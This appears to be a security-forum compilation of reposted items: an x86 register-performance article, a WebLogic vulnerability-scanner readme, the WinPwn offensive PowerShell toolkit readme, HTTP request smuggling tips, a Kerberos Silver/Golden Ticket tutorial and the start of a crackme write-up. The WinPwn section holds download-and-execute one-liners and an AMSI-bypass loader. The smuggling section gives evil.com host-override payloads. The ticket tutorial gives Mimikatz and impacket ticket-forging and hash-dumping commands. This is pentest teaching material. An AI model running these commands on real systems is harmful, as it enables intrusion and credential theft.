2 3 4 5 6 MOV AL, BYTE PTR [RDI] MOV EBX, EAX // partial register stall MOVZX EBX, BYTE PTR [RDI] AND EAX, 0xFFFFFF00 OR EBX, EAX // no partial register stall Partial register stall is relatively easy to detect on general-purpose registers, but similar problems could happen on FLAGS registers and that is pretty covert. Certain instructions like CMP update all bits of FLAGS as the execution results, but INC and DEC write into FLAGS except CF. So, if JCC directly use FLAGS content from INC/DEC, JCC would possibly have false dependency from unexpected instructions. 1 2 3 4 CMP EDX, DWORD PTR [EBP] ... INC ECX JBE LBB_XXX // JBE reads CF and ZF, so there would be a false dependency from CMP Consequently, on certain Intel architectures, compilers usually do not generate INC/DEC for loop count updating (i.e., i++ of for (int i = N; i != 0; i--)) or reuse the INC/DEC produced FLAGS on JCC. On the flip side, that would increase the code size and make I-cache issues. Fortunately, Intel has fixed the partial register stall on FLAGS since SandyBridge. But that still exists on most of the mainstream ATOM CPUs. So far, you may already think of SIMD registers. Yes, the partial register stall also occurs on SIMD registers. But partial SIMD/FLAGS register stall is an instruction selection issue instead of register selection. Let’s finish this section and move on. Architecture Bugs Certain Intel architectures (SandyBridge, Haswell, and Skylake) have a bug on three instructions - LZCNT, TZCNT, and POPCNT. These three instructions all have 2 operands (1 source register and 1 destination register), but they are different from most of the other 2-operand instructions like ADD. ADD reads its source and destination, and stores the result back to the destination register, which ADD-like instructions are called RMW (Read-Modify-Write). LZCNT, TZCNT, and POPCNT are not RWM that just read the source and write back to the destination. Due to some unknown reason, those Intel architectures incorrectly treat LZCNT, TZCNT, and POPCNT as the normal RWM instructions, which the LZCNT, TZCNT, and POPCNT have to wait for the computing results in both operands. Actually, only waiting for the source register getting done is enough. 1 2 3 POPCNT RCX, QWORD PTR [RDI] ... POPCNT RCX, QWORD PTR [RDI+8] Assume the above code is compiled from an unrolled loop that iteratively computes bit-count on an array. Since each POPCNT operates over a non-overlapped Int64 element, so the two POPCNT should execute totally in parallel. In other words, unrolling the loop by 2 iterations can make it at least 2x faster. However, that does not happen because Intel CPUs think that the second POPCNT needs to read RCX that written by the first POPCNT. So, the two POPCNT never gets parallel running. To solve this problem, we can change the POPCNT to use a dependency-free register as the destination, but that usually complicates the compiler’s register allocation too much. A simpler solution is to force triggering register renaming on the destination register via zeroing it. 1 2 3 4 5 XOR RCX, RCX // Force CPU to assign a new physical register to RCX POPCNT RCX, QWORD PTR [RDI] ... XOR RCX, RCX // Force CPU to assign a new physical register to RCX POPCNT RCX, QWORD PTR [RDI+8] Zeroing RCX by XOR RCX, RXC or SUB RCX, RCX does not actually execute XOR or SUB operations that instructions just trigger register renaming to assign an empty register to RCX. Therefore, XOR REG1, REG1 and SUB REG1, REG1 do not reach the CPU pipeline stages behind register renaming, which makes the zeroing very cheap even though that increases CPU front-end pressures a bit. SIMD Registers Intel fulfills really awesome SIMD acceleration via SSE/AVX/AVX-512 ISA families. But there are more tricks on SIMD code generation than the scalar side. Most of the issues are not only about instruction/register selections but also impacted by instruction encoding, calling conventions, and hardware optimizations, etc. Intel introduced VEX encoding with AVX that allows instructions to have an additional register to make the destination non-destructive. That is really good for register allocation on new SIMD instructions. However, Intel made a VEX counterpart for every old SSE instruction even though non-SIMD floating-point instructions. Then something gets messed up. 1 2 3 MOVAPS XMM0, XMMWORD PTR [RDI] ... VSQRTSS XMM0, XMM0, XMM1 // VSQRTSS XMM0, XMM1, XMM1 could be much faster SQRTSS XMM0, XMM1 computes the square root of the floating point number in XMM1 and writes the result into XMM0. The VEX version VSQRTSS requires 3 register operands, which copies the upper 64-bit of the second operand to the result. That makes VSQRTSS has additional dependencies on the second operand. For example, in the above code, VSQRTSS XMM0, XMM0, XMM1 has to wait for loading data into XMM0 but that is useless for scalar floating-point code. You may think that we can let compilers always reuse the 3rd register at the 2nd position, VSQRTSS XMM0, XMM1, XMM1, to break the dependency. However, that does not work when the 3rd operand directly from a memory location, like VSQRTSS XMM0, XMM1, XMMWORD PTR [RDI]. In that situation, a better solution would insert XOR to trigger the register renaming for dst. Usually, programmers think that using 256-bit YMM registers should get 2x faster than 128-bit XMM registers. Actually, that is not always true. Windows x64 calling conventions define XMM0-XMM15 as callee saved registers, so using YMM0-YMM15 would cause more caller saving code than XMM registers. Moreover, Intel only implemented store forwarding for registers <= 128-bit, so that spilling YMM register could be more expensive than XMM. These additional overheads could reduce the benefits of using YMM. One More Thing Look back at the very beginning code of this post, that seems not to fall into the above categories. But the 2 lines of code still may run in different performances. In the code section below, the comments show the instruction encoding, which means the binary representation of instructions in memory. We can see using ADD with EAX as dst register is 1-byte short than another, so that has higher code density and better cache-friendly. 1 2 ADD EAX, 0xffff0704 // 05 04 07 FF FF ADD EBX, 0xffff0704 // 81 C3 04 07 FF FF Consequently, even though selecting EAX or other registers (like EBX, ECX, R8D, etc.) does not directly change ADD‘s latency/throughput, it is also possible to impact the whole program performance. Sursa: https://fiigii.com/2020/02/16/Does-register-selection-matter-to-performance-on-x86-CPUs/

weblogicScaner 截至 2020 年1月15日，weblogic 漏洞扫描工具。若存在未记录且已公开 POC 的漏洞，欢迎提交 issue。 原作者已经收集得比较完整了，在这里做了部分的 bug 修复，部分脚本 POC 未生效，配置错误等问题。之前在做一次内网渗透，扫了一圈，发现 CVE-2017-10271 与 CVE-2019-2890，当时就郁闷了，怎么跨度这么大，中间的漏洞一个都没有，什么运维人员修一半，漏一半的，查了一下发现部分 POC 无法使用。在这个项目里面对脚本做了一些修改，提高准确率。 目前可检测漏洞编号有（部分非原理检测，需手动验证）： weblogic administrator console CVE-2014-4210 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 CVE-2017-3506 CVE-2017-10271 CVE-2018-2628 CVE-2018-2893 CVE-2018-2894 CVE-2018-3191 CVE-2018-3245 CVE-2018-3252 CVE-2019-2618 CVE-2019-2725 CVE-2019-2729 CVE-2019-2890 快速开始 依赖 python >= 3.6 进入项目目录，使用以下命令安装依赖库 $ pip3 install requests 使用说明 usage: ws.py [-h] -t TARGETS [TARGETS ...] -v VULNERABILITY [VULNERABILITY ...] [-o OUTPUT] optional arguments: -h, --help 帮助信息 -t TARGETS [TARGETS ...], --targets TARGETS [TARGETS ...] 直接填入目标或文件列表（默认使用端口7001）. 例子： 127.0.0.1:7001 -v VULNERABILITY [VULNERABILITY ...], --vulnerability VULNERABILITY [VULNERABILITY ...] 漏洞名称或CVE编号，例子："weblogic administrator console" -o OUTPUT, --output OUTPUT 输出 json 结果的路径。默认不输出结果 Sursa: https://github.com/0xn0ne/weblogicScanner

sodium-native Low level bindings for libsodium. npm install sodium-native The goal of this project is to be thin, stable, unopionated wrapper around libsodium. All methods exposed are more or less a direct translation of the libsodium c-api. This means that most data types are buffers and you have to manage allocating return values and passing them in as arguments intead of receiving them as return values. This makes this API harder to use than other libsodium wrappers out there, but also means that you'll be able to get a lot of perf / memory improvements as you can do stuff like inline encryption / decryption, re-use buffers etc. This also makes this library useful as a foundation for more high level crypto abstractions that you want to make. Usage var sodium = require('sodium-native') var nonce = Buffer.alloc(sodium.crypto_secretbox_NONCEBYTES) var key = sodium.sodium_malloc(sodium.crypto_secretbox_KEYBYTES) // secure buffer var message = Buffer.from('Hello, World!') var ciphertext = Buffer.alloc(message.length + sodium.crypto_secretbox_MACBYTES) sodium.randombytes_buf(nonce) // insert random data into nonce sodium.randombytes_buf(key) // insert random data into key // encrypted message is stored in ciphertext. sodium.crypto_secretbox_easy(ciphertext, message, nonce, key) console.log('Encrypted message:', ciphertext) var plainText = Buffer.alloc(ciphertext.length - sodium.crypto_secretbox_MACBYTES) if (!sodium.crypto_secretbox_open_easy(plainText, ciphertext, nonce, key)) { console.log('Decryption failed!') } else { console.log('Decrypted message:', plainText, '(' + plainText.toString() + ')') } Documentation Complete documentation may be found on the sodium-friends website License MIT Sursa: https://github.com/sodium-friends/sodium-native

WinPwn In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. I often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. They are loaded into RAM via IEX Downloadstring. Any suggestions, feedback, Pull requests and comments are welcome! Just Import the Modules with: Import-Module .\WinPwn.ps1 or iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') For AMSI Bypass use the following oneliner: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1') If you find yourself stuck on a windows system with no internet access - no problem at all, just use Offline_Winpwn.ps1, all scripts and executables are included. Functions available after Import: WinPwn -> Menu to choose attacks: Inveigh -> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integrated sessionGopher -> Executes Sessiongopher Asking you for parameters kittielocal -> Obfuscated Invoke-Mimikatz version Safetykatz in memory Dump lsass using rundll32 technique Download and run obfuscated Lazagne Dump Browser credentials Customized Mimikittenz Version Exfiltrate Wifi-Credentials Dump SAM-File NTLM Hashes localreconmodules -> Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP Checks the Powershell event logs for credentials or other sensitive informations Collect Browser Credentials and history Search for passwords in the registry and on the file system Find sensitive files (config files, RDP files, keepass Databases) Search for .NET Binaries on the local system Optional: Get-Computerdetails (Powersploit) and PSRecon domainreconmodules -> Collect various domain informations for manual review Find AD-Passwords in description fields Search for potential sensitive domain share files ACLAnalysis Unconstrained delegation systems/users are enumerated MS17-10 Scanner for domain systems Bluekeep Scanner for domain systems SQL Server discovery and Auditing functions (default credentials, passwords in the database and more) MS-RPRN Check for Domaincontrollers or all systems Group Policy Audit with Grouper2 An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. Privescmodules -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords, dll Hijacking, File Permissions, IKEExt Check, Rotten/Juicy Potato Check) kernelexploits -> MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only! MS16-032 - (2008/7/8/10/2012)! MS16-135 - (WS2k16 only)! CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1! CVE-2019-0841 - April 2019! CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019! CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019! CVE-2019-1215 - September 2019 - x64 only! CVE-2020-0638 - February 2020 - x64 only! Juicy-Potato Exploit UACBypass -> UAC Magic, Based on James Forshaw's three part post on UAC UAC Bypass cmstp technique, by Oddvar Moe DiskCleanup UAC Bypass, by James Forshaw DccwBypassUAC technique, by Ernesto Fernandez and Thomas Vanhoutte shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit) groupsearch -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit) Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking powerSQL -> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection Attacks Sharphound -> Bloodhound 3.0 Report adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record MS17-10 -> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerability Sharpcradle -> Load C# Files from a remote Webserver to RAM DomainPassSpray -> DomainPasswordSpray Attacks, one password for all domain users bluekeep -> Bluekeep Scanner for domain systems TO-DO Some obfuskation More obfuscation Proxy via PAC-File support Get the scripts from my own creds repository (https://github.com/S3cur3Th1sSh1t/Creds) to be independent from changes in the original repositories More Recon/Exploitation functions Add MS17-10 Scanner Add menu for better handling of functions Amsi Bypass Mailsniper integration CREDITS Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash Arvanaghi - SessionGopher PowerShellMafia - Powersploit Dionach - PassHunt A-mIn3 - WINSpect 411Hall - JAWS sense-of-security - ADrecon dafthack - DomainPasswordSpray rasta-mouse - Sherlock, AMsi Bypass AlessandroZ - LaZagne samratashok - nishang leechristensen - Random Repo HarmJ0y - Many good Blogposts, Gists and Scripts NETSPI - PowerUpSQL Cn33liz - p0wnedShell rasta-mouse - AmsiScanBufferBypass l0ss - Grouper2 dafthack - DomainPasswordSpray enjoiz - PrivEsc James Forshaw - UACBypasses Oddvar Moe - UACBypass Legal disclaimer: Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes. Sursa: https://github.com/S3cur3Th1sSh1t/WinPwn

HTTP Request Smuggling – 5 Practical Tips When James Kettle (@albinowax) from PortSwigger published his ground-breaking research on HTTP request smuggling six months ago, I did not immediately delve into the details of it. Instead, I ignored what was clearly a complicated type of attack for a couple of months until, when the time came for me to advise a client on their infrastructure security, I felt I better made sure I understood what all the fuss was about. Since then, I have been able to leverage the technique in a number of nifty scenarios with varying results. This post focuses on a number of practical considerations and techniques that I have found useful when investigating the impact of the attack against servers and websites that were found to be vulnerable. If you are unfamiliar with HTTP request smuggling, I strongly recommend you read up on the topic in order to better understand what follows below. These are the two absolute must-reads: HTTP Desync Attacks: Request Smuggling Reborn HTTP Desync Attacks: what happened next Recap As a recap, there are some key topics that you need to grasp when talking about request smuggling as a technique: Desynchronization At the heart of a HTTP request smuggling vulnerability is the fact that two communicating servers are out of sync with each other: upon receiving a HTTP request message with a maliciously crafted payload, one server will interpret the payload as the end of the request and move on to the “next HTTP request” that is embedded in the payload, while the second will interpret it as a single HTTP request, and handle it as such. Request Poisoning As a result of a successful desynchronization attack, an attacker can poison the response of the HTTP request that is appended to the malicious payload. For example, by embedding a smuggled HTTP request to a page evil.html, an unsuspecting user might get the response of the evil page, rather than the actual response to a request they sent to the server. Smuggling result The result of a successful HTTP smuggling attack will depend heavily on how the server and the client respond to the poisoned request. For example, a successful attack against a static website that hosts a single image file will have a very different impact than successfully targeting a dynamic web application with thousands of concurrent active users. To some extent, you might be able to control the result of your smuggling attack, but in some cases you might be unlucky and need to conclude that the impact of the attack is really next to none. Practical tips By and large, I can categorize my experiences with successful request smuggling attacks in two categories: exploiting the application logic, and exploiting server redirects. When targeting a vulnerable website with a rich web application, it is often possible to exfiltrate sensitive information through the available application features. If any information is stored for you to retrieve at a later point in time (think of a chat, profile description, logs, ….) you might be able to store full HTTP requests in a place where you can later read them. When leveraging server redirects, on the other hand, you need to consider two things to build a decent POC: a redirect needs to be forced, and it should point to an attacker-controlled server in order to have an impact. Below are five practical tips that I found useful in determining the impact of a HTTP request smuggling vulnerability. #1 – Force a redirect Before even trying to smuggle a malicious payload, it is worth establishing what payload will help you achieve the desired result. To test this, I typically end up sending a number of direct requests to the vulnerable server, to see how it handles edge cases. When you find a requests that results in a server direct (HTTP status code 30X), you can move on to the next step. Some tests I have started to incorporate in my routine when looking for a redirect are: /aspnet_client on Microsoft IIS will always append a trailing slash and redirect to/aspnet_client/ Some other directories that tend to do this are /content, /assets,/images, /styles, … Often http requests will redirect to https I found one example where the path of the referer header was used to redirect back to, i.e. Referer: https://www.company.com//abc.burpcollaborator.net/hacked would redirect to //abc.burpcollaborator.net/hacked Some sites will redirect all files with a certain file extensions, e.g. test.php to test.aspx #2 – Specify a custom host When you found a request that results in a redirect, the next step is to determine whether you can force it to redirect to a different server. I have been able to achieve this by trying each of the following: Override the hostname that the server will parse in your smuggled request by including any of the following headers and investigating how the server responds to them: Host: evil.com X-Host: evil.com X-Forwarded-Host: evil.com Similarly, it might work to include the overridden hostname in the first line of the smuggled request: GET http://evil.com/ HTTP/1.1 Try illegally formatting the first line of the smuggled request: GET .evil.com HTTP/1.1 will work if the server appends the URI to the existing hostname: Location: https://vulnerable.com.evil.com #3 – Leak information Regardless of whether you were able to issue a redirect to an attacker-controlled server, it’s worth investigating the features of the application running on the vulnerable server. This heavily depends on the type of application you are targeting, but a few pointers of things you might look for are: Email features – see if you can define the contents of an email of which receive a copy; Chat features – if you can append a smuggled request, you may end up reading the full HTTP request in your chat window; Update profile (name, description, …) – any field that you can write and read could be useful, as long as it allows special and new-line characters; Convert JSON to a classic POST body – if you want to leverage an application feature, but it communicates via JSON (e.g. {"a":"b", "c":"3"}), see if you can change the encoding to a classic a=b&c=3 format with the header Content-Type: application/x-www-form-urlencoded. #4 – Perfect your smuggled request If you are facing issues when launching a smuggling attack, and you don’t see your expected redirect but are facing unexpected error codes (e.g. 400 Bad Request), you may need to put some more information in your smuggled request. Some servers fail when it cannot find expected elements in the HTTP request. Here are some things that sometimes work: Define Content-length and Content-Type headers; Ensure you set Content-Type to application/x-www-form-urlencoded if you are smuggling a POST request; Play with the content length of the smuggled request. In a lot of cases, by increasing or decreasing the smuggled content length, the server will respond differently; Switch GET to POST request, because some servers don’t like GET requests with a non-zero length body. Make sure the server does not receive multiple Host headers, i.e. by pushing the appended request into the POST body of your smuggled request; Sometimes it helps to troubleshoot these kinds of issues if you can find a different page that reflects your poisoned HTTP request, e.g. look for pages that return values in POST bodies, for example an error page with an error message. If you can read the contents of your relayed request, you might figure out why your payload is not accepted by the server; If the server is behind a typical load-balancer like CloudFlare, Akamai or similar, see if you can find its public IP via a service like SecurityTrails and point the HTTP request smuggling attack directly to this “backend”; I have seen cases where the non-encrypted (HTTP) service listening on the server is vulnerable to HTTP request smuggling attacks, whereas the secure channel (HTTPS) service isn’t, and the other way around. Ensure you test both separately and make sure you investigate the impact of both services separately. For example, when HTTP is vulnerable, but all application logic is only served on HTTPS pages, you will have a hard time abusing application logic to demonstrate impact. #5 – Build a good POC If you are targeting application logic and you can exfiltrate the full HTTP body of arbitrary requests, that basically boils down to a session hijacking attack of arbitrary victims hitting your poisoned requests, because you can view the session cookies in the request headers and are not hindered by browser-side mitigations like the http-only flag in a typical XSS scenario. This is the ideal scenario from an attacker’s point of view; When you found a successful redirect, try poisoning a few requests and monitor your attacker server to see what information is sent to your server. Typically a browser will not include session cookies when redirecting the client to a different domain, but sometimes headless clients are less secure: they may not expect redirects, and might send sensitive information even when redirected to a different server. Make sure to inspect GET parameters, POST bodies and request headers for juicy information; When a redirect is successful, but you are not getting anything sensitive your way, find a page that includes JavaScript files to turn the request poisoning into a stored XSS, ensure your redirect points to a JavaScript payload (e.g. https://xss.honoki.net/), and create a POC that generates a bunch of iframes with the vulnerable page while poisoning the requests, until one of the <script> tags ends up hitting the poisoned request, and redirects to the malicious script; If the target is as static as it gets, and you cannot find a redirect, or there isn’t a page that includes a local JavaScript file, consider holding on to the vulnerability in case you can chain it with a different one instead of reporting it as is. Most bug bounty programs will not accept or reward a HTTP request smuggling vulnerability if you cannot demonstrate a tangible impact. Finally, keep in mind to act responsibly when testing for HTTP request smuggling, and always consider the impact on production services. When in doubt, reach out to the people running the show to ensure you are not causing any trouble. Sursa: https://honoki.net/2020/02/18/http-request-smuggling-5-practical-tips/

Silver & Golden Tickets 15 Jan 2020 · 13 min Author : Pixis Active Directory Windows In this post » PAC » Silver Ticket » Golden Ticket » Encryption methods » Conclusion » Resources Now that we have seen how Kerberos works in Active Directory, we are going to discover together the notions of Silver Ticket and Golden Ticket. To understand how they work, it is necessary to primary focus on the PAC (Privilege Attribute Certificate). PAC PAC is kind of an extension of Kerberos protocol used by Microsoft for proper rights management in Active Directory. The KDC is the only one to really know everything about everyone. It is therefore necessary for it to transmit this information to the various services so that they can create security tokens adapted to the users who use these services. Note : Microsoft uses an existing field in the tickets to store information about the user. This field is “authorization-data”. So it’s not an “extension” per say There is a lot of information about the user in his PAC, such as his name, ID, group membership, security information, and so on. The following is a summary of a PAC found in a TGT. It has been simplified to make it easier to understand. AuthorizationData item ad-type: AD-Win2k-PAC (128) Type: Logon Info (1) PAC_LOGON_INFO: 01100800cccccccce001000000000000000002006a5c0818... Logon Time: Aug 17, 2018 16:25:05.992202600 Romance Daylight Time Logoff Time: Infinity (absolute time) PWD Last Set: Aug 16, 2018 14:13:10.300710200 Romance Daylight Time PWD Can Change: Aug 17, 2018 14:13:10.300710200 Romance Daylight Time PWD Must Change: Infinity (absolute time) Acct Name: pixis Full Name: pixis Logon Count: 7 Bad PW Count: 2 User RID: 1102 Group RID: 513 GROUP_MEMBERSHIP_ARRAY Referent ID: 0x0002001c Max Count: 2 GROUP_MEMBERSHIP: Group RID: 1108 Attributes: 0x00000007 .... .... .... .... .... .... .... .1.. = Enabled: The enabled bit is SET .... .... .... .... .... .... .... ..1. = Enabled By Default: The ENABLED_BY_DEFAULT bit is SET .... .... .... .... .... .... .... ...1 = Mandatory: The MANDATORY bit is SET GROUP_MEMBERSHIP: Group RID: 513 Attributes: 0x00000007 .... .... .... .... .... .... .... .1.. = Enabled: The enabled bit is SET .... .... .... .... .... .... .... ..1. = Enabled By Default: The ENABLED_BY_DEFAULT bit is SET .... .... .... .... .... .... .... ...1 = Mandatory: The MANDATORY bit is SET User Flags: 0x00000020 User Session Key: 00000000000000000000000000000000 Server: DC2016 Domain: HACKNDO SID pointer: Domain SID: S-1-5-21-3643611871-2386784019-710848469 (Domain SID) User Account Control: 0x00000210 .... .... .... ...0 .... .... .... .... = Don't Require PreAuth: This account REQUIRES preauthentication .... .... .... .... 0... .... .... .... = Use DES Key Only: This account does NOT have to use_des_key_only .... .... .... .... .0.. .... .... .... = Not Delegated: This might have been delegated .... .... .... .... ..0. .... .... .... = Trusted For Delegation: This account is NOT trusted_for_delegation .... .... .... .... ...0 .... .... .... = SmartCard Required: This account does NOT require_smartcard to authenticate .... .... .... .... .... 0... .... .... = Encrypted Text Password Allowed: This account does NOT allow encrypted_text_password .... .... .... .... .... .0.. .... .... = Account Auto Locked: This account is NOT auto_locked .... .... .... .... .... ..1. .... .... = Don't Expire Password: This account DOESN'T_EXPIRE_PASSWORDs .... .... .... .... .... ...0 .... .... = Server Trust Account: This account is NOT a server_trust_account .... .... .... .... .... .... 0... .... = Workstation Trust Account: This account is NOT a workstation_trust_account .... .... .... .... .... .... .0.. .... = Interdomain trust Account: This account is NOT an interdomain_trust_account .... .... .... .... .... .... ..0. .... = MNS Logon Account: This account is NOT a mns_logon_account .... .... .... .... .... .... ...1 .... = Normal Account: This account is a NORMAL_ACCOUNT .... .... .... .... .... .... .... 0... = Temp Duplicate Account: This account is NOT a temp_duplicate_account .... .... .... .... .... .... .... .0.. = Password Not Required: This account REQUIRES a password .... .... .... .... .... .... .... ..0. = Home Directory Required: This account does NOT require_home_directory .... .... .... .... .... .... .... ...0 = Account Disabled: This account is NOT disabled This PAC is found in every tickets (TGT or TGS) and is encrypted either with the KDC key or with the requested service account’s key. Therefore the user has no control over this information, so he cannot modify his own rights, groups, etc. This structure is very important because it allows a user to access (or not access) a service, a resource, to perform certain actions. The PAC can be considered as the user’s security badge: He can use it to open doors, but he cannot open doors to which he does not have access. Silver Ticket When a customer needs to use a service, he asks for a TGS (Ticket Granting Service) to the KDC. This process goes through two requests KRB_TGS_REQ and KRB_TGS_REP. As a reminder, here is what a TGS looks like schematically. It is encrypted with the NT hash of the account that is running the service (machine account or user account). Thus, if an attacker manages to extract the password or NT hash of a service account, he can then forge a service ticket (TGS) by choosing the information he wants to put in it in order to access that service, without asking the KDC. It is the attacker who builds this ticket. It is this forged ticket that is called Silver Ticket. Let’s take as an example an attacker who finds the NT hash of DESKTOP-01 machine account (DESKTOP-01$). The attacker can create a block of data corresponding to a ticket like the one found in KRB_TGS_REP. He will specify the domain name, the name of the requested service (its SPN - Service Principal Name), a username (which he can choose arbitrarily), his PAC (which he can also forge). Here is a simplistic example of a ticket that the attacker can create: realm : adsec.local sname : cifs\desktop-01.adsec.local enc-part : # Encrypted with compromised NT hash key : 0x309DC6FA122BA1C # Arbitrary session key crealm : adsec.local cname : pixisAdmin authtime : 2050/01/01 00:00:00 # Ticket validity date authorization-data : Forged PAC where, say, this user is Domain Admin Once this structure is created, the user encrypts the enc-part block with the compromised NT hash, then it can create a KRB_AP_REQ from scratch. He just has to send this ticket to the targeted service, along with an authenticator that he encrypts with the session key he arbitrarily chose in the TGS. The service will be able to decrypt the TGS, extract the session key, decrypt the authenticator and provide the service to the user since the information forged in the PAC indicates that the user is a Domain Admin, and this service allows Domain Admins to use it. That seems great, right? Only… the PAC is double signed. The first signature uses service account’s secret, but the second uses domain controller’s secret (krbtgt account’s secret). The attacker only knows the service account’s secret, so he is not able to forge the second signature. However, when the service receives this ticket, it usually verifies only the first signature. This is because service accounts with SeTcbPrivilege, accounts that can act as part of the operating system (for example the local SYSTEM account), do not verify the Domain Controller’s signature. That’s very convenient from an attacker’s perspective! It also means that even if krbtgt password is changed, Silver Tickets will still work, as long as the service’s password doesn’t change. Here is a schematic summarizing the attack: In practice, here is a screenshot showing the creation of a Silver Ticket with Mimikatz tool developed by Benjamin Delpy (@gentilkiwi). Here’s the command line used in Mimikatz: kerberos::golden /domain:adsec.local /user:random_user /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:0123456789abcdef0123456789abcdef /target:DESKTOP-01.adsec.local /service:cifs /ptt This command line creates a ticket for adsec.local domain with an arbitrary username (random_user), and targets CIFS service of DESKTOP-01 machine by providing its NT hash. It is also possible to create a Silver Ticket under linux using impaket, via ticketer.py. ticketer.py -nthash 0123456789abcdef0123456789abcdef -domain-sid S-1-5-21-1423455951-1752654185-1824483205 -domain adsec.local -spn CIFS/DESKTOP-01.adsec.local random_user Then export the ticket path into a special environment variable called KRB5CCNAME. export KRB5CCNAME='/path/to/random_user.ccache' Finally, all the tools from impacket can be used with this ticket, via the -k option. psexec.py -k DESKTOP-01.adsec.local Golden Ticket We have seen that with a Silver Ticket, it was possible to access a service provided by a domain account if that account was compromised. The service accepts information encrypted with its own secret, since in theory only the service itself and the KDC are aware of this secret. This is a good start, but we can go further. By building a Silver Ticket, the attacker gets rid of the KDC since in reality, the user’s real PAC contained in his TGT does not allow him to perform all the actions he wants. To be able to modify the TGT, or forge a new one, one would need to know the key that encrypted it, i.e. the KDC key. This key is in fact the hash of the krbtgt account. This account is a simple account, with no particular rights (at system or Active Directory level) and is even disabled. This low exposure makes it better protected. If an attacker ever manages to find the secret’s hash of this account, he will then be able to forge a TGT with an arbitrary PAC. And that’s kind of like the Holy Grail. Just forge a TGT stating that the user is part of “Domain Admins” group, and that’s it. With such a TGT in his hands, the user can ask the KDC for any TGS for any service. These TGSs will have a copy of the PAC that the attacker has forged, certifying that he is a Domain Admin. It is this forged TGT that is called Golden Ticket. In practice, here is a demonstration of how to create a Golden Ticket. First, we are in a session that does not have a cached ticket, and does not have the rights to access C$ share on the domain controller \\DC-01.adsec.local\C$. We then generate the Golden Ticket using the NT hash of the account krbtgt. Here’s the command line used in Mimikatz: /kerberos::golden /domain:adsec.local /user:random_user /sid:S-1-5-21-1423455951-1752654185-1824483205 /krbtgt:0123456789abcdef0123456789abcdef /ptt This command line creates a ticket for adsec.local domain with an arbitrary username (random_user), by providing the NT hash of krbtgt user. It creates a TGT with a PAC indicating that we are Domain Admin (among other things), and that we are called random_user (arbitrarily chosen). Once we have this ticket in memory, our session is able to request a TGS for any SPN, e.g. for CIFS\DC-01.adsec.local to read the contents of the share \\DC-01.adsec.local\C$. It is also possible to create a Golden Ticket under linux using impaket, via ticketer.py. ticketer.py -nthash 0123456789abcdef0123456789abcdef -domain-sid S-1-5-21-1423455951-1752654185-1824483205 -domain adsec.local random_user Then export the ticket path into the same special environment variable as before, called KRB5CCNAME. export KRB5CCNAME='/chemin/vers/random_user.ccache' Finally, all the tools from impacket can be used with this ticket, via the -k option. secretsdump.py -k DC-01.adsec.local -just-dc-ntlm -just-dc-user krbtgt Encryption methods Until now, we used NT hashes to create Silver/Golden Tickets. In reality, this means that we were using the RC4_HMAC_MD5 encryption method, but it’s not the only one available. Today, there are several encryption methods possible within Active Directory because they have evolved with versions of Windows. Here is a summary table from the Microsoft documentation The desired encryption method can be used to generate the TGT. The information can be found in EType field associated with the TGT. Here is an example using AES256 encryption. Furthermore, according to the presentation Evading Microsoft ATA for Active Directory Domination from Nikhil Mittal at Black Hat, this would allow not to be detected by Microsoft ATA, for the moment, since one avoids making a downgrade of encryption method. By default, the encryption method used is the strongest supported by the client. Conclusion This article clarifies the concepts of PAC, Silver Ticket, Golden Ticket, as well as the different encryption methods used in authentication. These notions are essential to understand Kerberos attacks in Active Directory. Feel free to leave a comment or find me on my Discord server if you have any questions or ideas! Resources FRENCH - Secrets d’authentification épisode II Kerberos contre-attaque - Aurélien Bordes ADSecurity - Pyrotek3 FRENCH - Kerberos Exploration - Rémi Vernier Network security: Configure encryption types allowed for Kerberos Encryption Type Selection in Kerberos Exchanges - Microsoft Sursa: https://en.hackndo.com/kerberos-silver-golden-tickets/

EXTORY's Crackme by Suraj Malhotra Feb 18, 2020 This will be a detailed writeup of EXTORY crackme from crackmes.one. As always I’ll try to make it easy to understand as much as possible so It’ll be longer than usual (with more than 30 screenshots XD). Also Make sure to leave some feedback as it took much more time as compared to my previous writeups. TLDR; Basically this crackme has 4 anti-debug checks(acc. to me). And I think its hard to solve it statically. There are many techniques that is often found in malwares. So it is worth to check it out. If you have not tried it, I’d advice you to please do and then continue with this writeup. I’ve also used a no. of tools for different purposes. Challenge Download EXTORY’s Crackme Initial Analysis As usual, We have to guess the right password and it will show the ‘Correct’ text in the app. For this I used DIE tool. Its a 64bit exe and uses MSVCP. So I began by searching for some strings and found that there is no ‘Correct’ and ‘Wrong’ string. But searching in Unicode strings I found some interesting stuff. Also In crypto tab we find an anti-debug technique. Cool, Now its time to hop over to IDA. Make sure to enable UNICODE strings. So we find their references and I observed that there is some thread stuff. After that I find that the ExitCode of that Thread is being compared to 1 and if its true we continue to use some ‘hgblelelbkjjgldd’ else 